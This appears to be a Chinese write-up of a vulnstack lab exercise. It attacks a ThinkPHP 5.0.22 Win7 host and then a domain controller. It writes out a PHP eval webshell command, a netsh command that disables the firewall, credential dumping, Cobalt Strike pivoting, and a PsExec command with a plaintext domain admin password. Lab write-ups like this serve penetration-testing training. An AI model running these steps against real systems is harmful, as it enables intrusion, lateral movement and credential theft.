单机域渗透练习

简介: 单机域渗透练习

环 境

Win7 +phpstudy+thinkphp(5.0.22) 双网卡

ip  192.168.5.139       桥接模式

ip  192.168.138.136   仅主机模式

Win2008                  仅主机模式

ip 192.168.5.139

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

首先访问url

http://192.168.5.139/

Goby扫描 发现tp5.x 远程命令执行

查看目录后 写入一句话


echo "<?php @eval($_POST['123']);?>" >C://phpStudy//PHPTutorial//WWW//public//shell.php


菜刀连接

查看存活主机


查看详细ip地址  ipconfig  /all  可以看到域  (忘了截图)

查找域ip  ping sun.com

查看域内用户

640.png

提权system 查看进程无杀毒软件

CS制作木马 一直连不上

发现防火墙没有关闭 直接关闭

netsh firewall set opmode disable

获取域用户密码

提权SYSTEM

内网可以用psexec登录的主机,基于ipc共享,要打开445端口才可以,所以扫一下445端口

Win7  双网卡 dc 内网 这个时候就让dc主动链接cs 可以通过win7 中转会话

win7  进入中专 建立监听 监听地址6666

再次生成木马 选择刚才的监听 6666

把木马和工具上传到win7

640.png

刚才我们看到了域内有三个用户 这里的用户就是域内用户 密码在上面已经抓取出来了

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138-u sun\Administrator -p admin@123 -d -c C:\phpStudy\PHPTutorial\WWW\public\dc.exe

抓取密码 可以看到dc的密码了域控也就到手了

相关文章
浦语·灵笔2:一款超强的图文多模态大模型,可直接生成图文并茂的完整文章!
浦语·灵笔2:一款超强的图文多模态大模型,可直接生成图文并茂的完整文章!
556 1
|
缓存
【SVN异常】svn更新时,出现不知道这样的主机的解决方案
svn更新时,出现不知道这样的主机的解决方案
1921 0
【SVN异常】svn更新时,出现不知道这样的主机的解决方案
|
2月前
|
JSON API 开发工具
快手平台根据关键词获取视频列表的 API 接口详解
本文介绍如何利用快手开放平台API,通过关键词搜索短视频。涵盖接口调用、参数配置、分页处理及响应解析,助开发者实现视频数据获取,适用于内容推荐、热点分析等场景,需注意权限、限流与数据合规。
459 0
EMQ
|
缓存 数据可视化 物联网
在 Windows 上搭建 MQTT 消息服务器
本文将以NanoMQ为例,演示如何通过安装包和源代码编译两种安装方式,在Windows系统中快速搭建一个可以支持多协议连接的物联网MQTT消息服务器。
EMQ
941 0
|
存储 Linux 开发工具
哪吒开发板的使用初尝试
哪吒开发板的使用初尝试
|
安全 Java API
基于Spring Boot REST API设计指南
【10月更文挑战第10天】 在现代Web应用开发中,RESTful API扮演着至关重要的角色。Spring Boot作为一个高效、便捷的Java开发框架,为构建RESTful API提供了强大的支持。本文将分享基于Spring Boot的REST API设计指南,涵盖从项目初始化到API文档配置的全过程。
344 0
|
数据采集 Web App开发 JSON
爬虫实战小案例—获取喜马拉雅账号的关注数据和粉丝数据生成电子表格并实现批量关注或者取关然后生成表格文件
爬虫实战小案例—获取喜马拉雅账号的关注数据和粉丝数据生成电子表格并实现批量关注或者取关然后生成表格文件
353 0
|
关系型数据库 MySQL 数据库连接
在 Go 中管理多个数据库连接
在 Go 中管理多个数据库连接
|
数据采集 监控 JavaScript
工厂生产管理系统MES十大核心功能模块
MES提供了对生产现场的实时可视化,帮助企业管理生产计划、物料追踪、工艺控制、产品质量和生产设备等方面的工作。
668 11